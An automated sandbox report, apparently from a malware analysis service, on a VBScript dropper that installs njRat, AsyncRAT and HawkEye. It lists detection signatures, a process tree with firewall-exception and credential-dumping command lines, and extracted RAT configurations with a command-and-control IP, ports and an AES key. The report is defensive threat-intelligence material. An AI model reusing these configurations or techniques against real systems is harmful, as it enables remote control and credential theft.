Loading ...

Play interactive tourEdit tour

Analysis Report PaymentNotification.vbs

Overview

General Information

Sample Name:PaymentNotification.vbs
Analysis ID:399489
MD5:f5b9f4ae6470dd78d53b60dcc6b32a5b
SHA1:c12a160ff346463dfea1a2a5b015b0efd56a9645
SHA256:3fb7c96dcb667562f755e56f05a892aa8326d0c905055f1ea75177e1785df46b
Tags:vbs
Infos:

Most interesting Screenshot:

Detection

HawkEye njRat AsyncRAT MailPassView
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Detected HawkEye Rat
Detected njRat
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected AsyncRAT
Yara detected HawkEye Keylogger
Yara detected MailPassView
Yara detected Njrat
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Changes the view of files in windows explorer (hidden files and folders)
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Drops PE files to the startup folder
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
May check the online IP address of the machine
Modifies the windows firewall
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 5972 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\PaymentNotification.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • Tmp.exe (PID: 240 cmdline: 'C:\Users\user\AppData\Local\Temp\Tmp.exe' MD5: 9B30598F8F05C46F8ABB22A4C2ABCC9E)
      • servieda.exe (PID: 5648 cmdline: 'C:\Users\user\AppData\Roaming\servieda.exe' MD5: 9B30598F8F05C46F8ABB22A4C2ABCC9E)
        • netsh.exe (PID: 4592 cmdline: netsh firewall add allowedprogram 'C:\Users\user\AppData\Roaming\servieda.exe' 'servieda.exe' ENABLE MD5: 98CC37BBF363A38834253E22C80A8F32)
          • conhost.exe (PID: 4860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • pgr.exe (PID: 1068 cmdline: 'C:\Users\user\AppData\Local\Temp\pgr.exe' MD5: A08F2FAC257ABBBDDDBBD4439F32CFD0)
      • netsh.exe (PID: 5596 cmdline: netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\pgr.exe' 'pgr.exe' ENABLE MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • conhost.exe (PID: 956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • tmp87E4.tmp.exe (PID: 5036 cmdline: 'C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe' MD5: 6107D33B54A998C142311E55B3EC53D2)
      • tmpFB21.tmp.exe (PID: 4928 cmdline: 'C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe' MD5: 5C0E9E0C72288F8B70BB68C0036ECB52)
        • vbc.exe (PID: 1428 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
        • vbc.exe (PID: 5824 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
  • d4c6a6df7bab3dad31763de990c4ed82.exe (PID: 2244 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe' MD5: 9B30598F8F05C46F8ABB22A4C2ABCC9E)
  • cleanup

Malware Configuration

Threatname: HawkEye

{"Modules": ["WebBrowserPassView", "mailpv", "Mail PassView"], "Version": ""}

Threatname: AsyncRAT

{"Server": "185.140.53.71", "Ports": "5622", "Version": "0.5.7B", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "", "AES_key": "OZbfeCW3Ui2w9m0b2sdvXKLHncuuEV1i", "Mutex": "AsyncMutex_6SI8OkPnk", "AntiDetection": "false", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "3", "HWID": "null", "Certificate": "MIIE8jCCAtqgAwIBAgIQALaURRywvfhLupCLKqRXsTANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjEwMzE5MjMyNjE5WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIRg8P1eV241T+5WAoYUJpVxKCp2hnrddZER5q6SuwiuoY5WnvnSHE86fmx6xl/ElyDi0aYdKZQgsRV52AsagcOyXPkYTuqgLaJa0uNP/ccUgEF58GRW9G4hxQ0yFipum00HgR4BC17MH/JlxA70ruPgctyQjb155Y9SA/np83nMY49/v/FNGINUINX7VVQmJkXvhptA0Xg//bKsMYgvjpT7RTp+dgd9Sfl3zZN0vd/OWvtZmjqgWG3FcBdKRjeQU0s8yYApwwz/u+XKy39FcEiIgtDSL4JLpaqgPI07lKqei20ZTjt/AjefXLkBO9i9BJ6cSTUvJL9XmMeWtssOuCLqTg54AQPjvZMVYYvkBhoHEe33fBqgV0/+oIcZpVW2bnRKNN58O1OV7xfp7Uz/K5EoxBGpTI+9BwBf6YdIkPCPsdzkahw4Alz2dm0tR9PiTtvyed571Fse+LSYskswzbfN24cvE183EEfGDdoiCQC9HrIR84g+nkQQKYy5mj5j0BN4NxIW7iuhb2X+a3FlR45KTWpy/p627aKpMeSgG2+zG6Io3gaDSAZ+g6CA+jVqqU81S5PxgZOQk4IbCaJWeyN++/iHEyyFY12jpiNkbVwZWU18Bx48uAZIKBPvpAy7BehRNYRfziR/zErfpf96kYCbDYJzO6/7AkTfQfsO4xhxAgMBAAGjMjAwMB0GA1UdDgQWBBQHQJ8DQO/zUgjsn27YFy2w7xPmbjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQAES/vZ9rtg1VF0ZlgPVaWR+J4hq/2Mo1LaJW6+VZmbsT/Kw/eZFxPiwCVqDuLXOk9zdBzQjaN+1jbFORJfRusSdwdAz3ELqtgWOHikAPc0oZfglzOT3wjQWEeahe82N8/FMU/s7gXQ03g2apinU3ySsgT9LdIkEtmwnJ6aLjLFWcKTS5t4hX1dsHSoLs2ulVV8vkTJzmEemZwsHTQmOU13q9B/cezpMx4X9AmoQFdiiGn7p9nsOce7dOD/hlFAVUszv9DY37Qwm12OSvxcP9U/vdVbV7GKkYNkZTzA4r3muyDO1/TMEgngfBFvOXFNlc1JQ+3E0AAoaciCjlGuNbjisKnch5/xrHYe+Lnz3lHhbk6ertrNlT10pfZVrOli47RwIgZhdCmg3915G5n0MaTHUHsUBUET5KTV90kNLTLQLwNq82/0HPWzdFRxJy0RNosBON2awrb8q0Y4N+qVBti0tfpu67a0rwzsZFGEIMIFWvM0JUM8EUrVj86ga7urRpaI/5Al89x4FUeNy3ojdpTRYq3flCWKsnk9p7cMhYXINWZFWdMa1IGGCmlK3YFoEczXqu9D6+zL8Z+xV+pj6rmwzX6PW9RqHIley0P7QBH8iE4AFY1p5PJorWqfs2d68CQuFXOPIunsKtcOzM30OSGck0r6l91Qpdyznv5RK6xaJA==", "ServerSignature": "ISWHB6EJmpETXkSrzzZO+4XR+tFBGrUqWIQgiq+f/Z1utnjjrtR9Zd9ssjAfbUEKoKn1g5ZnXJ3OdA2+5VA6HMPOcjGqbLku4qqYmiWI7nnOg4wV5tgp8fhdBCrJNoe6zLWGVZRFo+FFrnPI9SVkByKFSctFCK2mRMxEPMsqBuOB2yM9abBbLKED5R7WLkNZ9wqoIP6gwufU1ji8pjdVCuYo3OuhkgBL0kjZX3grqk0fHZ4BxsLsdNQMBgTw+W9NV4bKcuxgOo0V6O84Hir+6xsmY32AvEiVEz4+M3CBkWuNsnkjTcKfLI2LJ8Fi2EX6yBS96WSiOpUHxlD+MUGfyDF2QV3Q9nzCyUPTTr04mdeFDpoldcn0kHpsSpyVu1WuW1KS2AN4WdIlSJTOnfm68B/YiVAGvMeZ88eHdnLidkNioBDUtDk5PcS9sTLx0Xorr7wHQf7Fafjphg7NnxrxKOMBhv7k0bUGw3CSqjh/b/SPBjNTohLC1UtOS2tkNuF6syz5zwJ3Id+szSG3tX37C437dOug2ETg7x/O7F9QO/KMDbZ8whpW3X7W0v0mRk9pq0SnEW9Di48x/4FMvNzeTl6n7QV1Bgpv6HZsc3yHpKwz6fYjwhFfzP3WTUSi5cyzFj/bkfk7XJnmM+iNyBmyQoYBMs9OwGuAmLhJD3+yAoU=", "Group": "CONTACTS"}

Threatname: Njrat

{"Campaign ID": "SPRINGLES", "Version": "0.7d", "Install Name": "server.exe", "Install Dir": "TEMP", "Registry Value": "79c06ef4ef423d882819c4e66285ec85", "Host": "185.140.53.71", "Port": "3429", "Network Seprator": "|'|'|", "Install Flag": "False"}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exeCN_disclosed_20180208_cDetects malware from disclosed CN malware setFlorian Roth
  • 0x4d30:$x1: cmd.exe /c ping 0 -n 2 & del "
  • 0x4e88:$s3: Executed As
  • 0x4e6a:$s6: Download ERROR
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exeJoeSecurity_NjratYara detected NjratJoe Security
    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exenjrat1Identify njRatBrian Wallace @botnet_hunter
    • 0x4d9e:$a1: netsh firewall add allowedprogram
    • 0x4d6e:$a2: SEE_MASK_NOZONECHECKS
    • 0x5018:$b1: [TAP]
    • 0x4d30:$c3: cmd.exe /c ping
    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exeNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
    • 0x4d6e:$reg: SEE_MASK_NOZONECHECKS
    • 0x4e46:$msg: Execute ERROR
    • 0x4ea2:$msg: Execute ERROR
    • 0x4d30:$ping: cmd.exe /c ping 0 -n 2 & del
    C:\Users\user\AppData\Roaming\servieda.exeMAL_Winnti_Sample_May18_1Detects malware sample from Burning Umbrella report - Generic Winnti RuleFlorian Roth
    • 0xdd24:$s1: wireshark
    • 0xdcee:$s2: procexp
    Click to see the 18 entries

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmpJoeSecurity_NjratYara detected NjratJoe Security
      00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmpnjrat1Identify njRatBrian Wallace @botnet_hunter
      • 0x16fd:$a1: netsh firewall add allowedprogram
      • 0x188d:$b1: [TAP]
      • 0x647:$b2: & exit
      • 0x1683:$b2: & exit
      • 0x1651:$c1: md.exe /k ping 0 & del
      00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmpJoeSecurity_NjratYara detected NjratJoe Security
        00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmpnjrat1Identify njRatBrian Wallace @botnet_hunter
        • 0xe69d:$a1: netsh firewall add allowedprogram
        • 0xe82d:$b1: [TAP]
        • 0xd5e7:$b2: & exit
        • 0xe623:$b2: & exit
        • 0xe5f1:$c1: md.exe /k ping 0 & del
        0000000C.00000000.429733559.00000000006E2000.00000002.00020000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
          Click to see the 134 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.3.wscript.exe.1b86717d130.5.unpackCN_disclosed_20180208_cDetects malware from disclosed CN malware setFlorian Roth
          • 0x2f30:$x1: cmd.exe /c ping 0 -n 2 & del "
          • 0x3088:$s3: Executed As
          • 0x306a:$s6: Download ERROR
          0.3.wscript.exe.1b86717d130.5.unpackJoeSecurity_NjratYara detected NjratJoe Security
            0.3.wscript.exe.1b86717d130.5.unpacknjrat1Identify njRatBrian Wallace @botnet_hunter
            • 0x2f9e:$a1: netsh firewall add allowedprogram
            • 0x2f6e:$a2: SEE_MASK_NOZONECHECKS
            • 0x3218:$b1: [TAP]
            • 0x2f30:$c3: cmd.exe /c ping
            0.3.wscript.exe.1b86717d130.5.unpackNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
            • 0x2f6e:$reg: SEE_MASK_NOZONECHECKS
            • 0x3046:$msg: Execute ERROR
            • 0x30a2:$msg: Execute ERROR
            • 0x2f30:$ping: cmd.exe /c ping 0 -n 2 & del
            0.3.wscript.exe.1b8660a7cb0.0.unpackMAL_Winnti_Sample_May18_1Detects malware sample from Burning Umbrella report - Generic Winnti RuleFlorian Roth
            • 0xbf24:$s1: wireshark
            • 0xbeee:$s2: procexp
            Click to see the 127 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeAvira: detection malicious, Label: TR/Dropper.Gen
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exeAvira: detection malicious, Label: TR/Dropper.Gen7
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeAvira: detection malicious, Label: TR/Dropper.Gen7
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeAvira: detection malicious, Label: TR/Dropper.Gen
            Source: C:\Users\user\AppData\Roaming\servieda.exeAvira: detection malicious, Label: TR/Dropper.Gen
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeAvira: detection malicious, Label: TR/AD.MExecute.lzrac
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeAvira: detection malicious, Label: SPR/Tool.MailPassView.473
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeAvira: detection malicious, Label: TR/Dropper.Gen
            Found malware configurationShow sources
            Source: 0000000C.00000000.429733559.00000000006E2000.00000002.00020000.sdmpMalware Configuration Extractor: AsyncRAT {"Server": "185.140.53.71", "Ports": "5622", "Version": "0.5.7B", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "", "AES_key": "OZbfeCW3Ui2w9m0b2sdvXKLHncuuEV1i", "Mutex": "AsyncMutex_6SI8OkPnk", "AntiDetection": "false", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "3", "HWID": "null", "Certificate": "MIIE8jCCAtqgAwIBAgIQALaURRywvfhLupCLKqRXsTANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjEwMzE5MjMyNjE5WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIRg8P1eV241T+5WAoYUJpVxKCp2hnrddZER5q6SuwiuoY5WnvnSHE86fmx6xl/ElyDi0aYdKZQgsRV52AsagcOyXPkYTuqgLaJa0uNP/ccUgEF58GRW9G4hxQ0yFipum00HgR4BC17MH/JlxA70ruPgctyQjb155Y9SA/np83nMY49/v/FNGINUINX7VVQmJkXvhptA0Xg//bKsMYgvjpT7RTp+dgd9Sfl3zZN0vd/OWvtZmjqgWG3FcBdKRjeQU0s8yYApwwz/u+XKy39FcEiIgtDSL4JLpaqgPI07lKqei20ZTjt/AjefXLkBO9i9BJ6cSTUvJL9XmMeWtssOuCLqTg54AQPjvZMVYYvkBhoHEe33fBqgV0/+oIcZpVW2bnRKNN58O1OV7xfp7Uz/K5EoxBGpTI+9BwBf6YdIkPCPsdzkahw4Alz2dm0tR9PiTtvyed571Fse+LSYskswzbfN24cvE183EEfGDdoiCQC9HrIR84g+nkQQKYy5mj5j0BN4NxIW7iuhb2X+a3FlR45KTWpy/p627aKpMeSgG2+zG6Io3gaDSAZ+g6CA+jVqqU81S5PxgZOQk4IbCaJWeyN++/iHEyyFY12jpiNkbVwZWU18Bx48uAZIKBPvpAy7BehRNYRfziR/zErfpf96kYCbDYJzO6/7AkTfQfsO4xhxAgMBAAGjMjAwMB0GA1UdDgQWBBQHQJ8DQO/zUgjsn27YFy2w7xPmbjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQAES/vZ9rtg1VF0ZlgPVaWR+J4hq/2Mo1LaJW6+VZmbsT/Kw/eZFxPiwCVqDuLXOk9zdBzQjaN+1jbFORJfRusSdwdAz3ELqtgWOHikAPc0oZfglzOT3wjQWEeahe82N8/FMU/s7gXQ03g2apinU3ySsgT9LdIkEtmwnJ6aLjLFWcKTS5t4hX1dsHSoLs2ulVV8vkTJzmEemZwsHTQmOU13q9B/cezpMx4X9AmoQFdiiGn7p9nsOce7dOD/hlFAVUszv9DY37Qwm12OSvxcP9U/vdVbV7GKkYNkZTzA4r3muyDO1/TMEgngfBFvOXFNlc1JQ+3E0AAoaciCjlGuNbjisKnch5/xrHYe+Lnz3lHhbk6ertrNlT10pfZVrOli47RwIgZhdCmg3915G5n0MaTHUHsUBUET5KTV90kNLTLQLwNq82/0HPWzdFRxJy0RNosBON2awrb8q0Y4N+qVBti0tfpu67a0rwzsZFGEIMIFWvM0JUM8EUrVj86ga7urRpaI/5Al89x4FUeNy3ojdpTRYq3flCWKsnk9p7cMhYXINWZFWdMa1IGGCmlK3YFoEczXqu9D6+zL8Z+xV+pj6rmwzX6PW9RqHIley0P7QBH8iE4AFY1p5PJorWqfs2d68CQuFXOPIunsKtcOzM30OSGck0r6l91Qpdyznv5RK6xaJA==", "ServerSignature": "ISWHB6EJmpETXkSrzzZO+4XR+tFBGrUqWIQgiq+f/Z1utnjjrtR9Zd9ssjAfbUEKoKn1g5ZnXJ3OdA2+5VA6HMPOcjGqbLku4qqYmiWI7nnOg4wV5tgp8fhdBCrJNoe6zLWGVZRFo+FFrnPI9SVkByKFSctFCK2mRMxEPMsqBuOB2yM9abBbLKED5R7WLkNZ9wqoIP6gwufU1ji8pjdVCuYo3OuhkgBL0kjZX3grqk0fHZ4BxsLsdNQMBgTw+W9NV4bKcuxgOo0V6O84Hir+6xsmY32AvEiVEz4+M3CBkWuNsnkjTcKfLI2LJ8Fi2EX6yBS96WSiOpUHxlD+MUGfyDF2QV3Q9nzCyUPTTr04mdeFDpoldcn0kHpsSpyVu1WuW1KS2AN4WdIlSJTOnfm68B/YiVAGvMeZ88eHdnLidkNioBDUtDk5PcS9sTLx0Xorr7wHQf7Fafjphg7NnxrxKOMBhv7k0bUGw3CSqjh/b/SPBjNTohLC1UtOS2tkNuF6syz5zwJ3Id+szSG3tX37C437dOug2ETg7x/O7F9QO/KMDbZ8whpW3X7W0v0mRk9pq0SnEW9Di48x/4FMvNzeTl6n7QV1Bgpv6HZsc3yHpKwz6fYjwhFfzP3WTUSi5cyzFj/bkfk7XJnmM+iNyBmyQoYBMs9OwGuAmLhJD3+yAoU=", "Group": "CONTACTS"}
            Source: 0.3.wscript.exe.1b86717d130.5.raw.unpackMalware Configuration Extractor: Njrat {"Campaign ID": "SPRINGLES", "Version": "0.7d", "Install Name": "server.exe", "Install Dir": "TEMP", "Registry Value": "79c06ef4ef423d882819c4e66285ec85", "Host": "185.140.53.71", "Port": "3429", "Network Seprator": "|'|'|", "Install Flag": "False"}
            Source: tmpFB21.tmp.exe.4928.13.memstrMalware Configuration Extractor: HawkEye {"Modules": ["WebBrowserPassView", "mailpv", "Mail PassView"], "Version": ""}
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeMetadefender: Detection: 75%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeReversingLabs: Detection: 82%
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeMetadefender: Detection: 90%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeReversingLabs: Detection: 91%
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exeMetadefender: Detection: 90%Perma Link
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exeReversingLabs: Detection: 91%
            Source: C:\Users\user\AppData\Roaming\servieda.exeMetadefender: Detection: 75%Perma Link
            Source: C:\Users\user\AppData\Roaming\servieda.exeReversingLabs: Detection: 82%
            Multi AV Scanner detection for submitted fileShow sources
            Source: PaymentNotification.vbsVirustotal: Detection: 12%Perma Link
            Source: PaymentNotification.vbsReversingLabs: Detection: 17%
            Yara detected NjratShow sources
            Source: Yara matchFile source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: d4c6a6df7bab3dad31763de990c4ed82.exe PID: 2244, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: servieda.exe PID: 5648, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 5972, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Tmp.exe PID: 240, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, type: DROPPED
            Source: Yara matchFile source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE
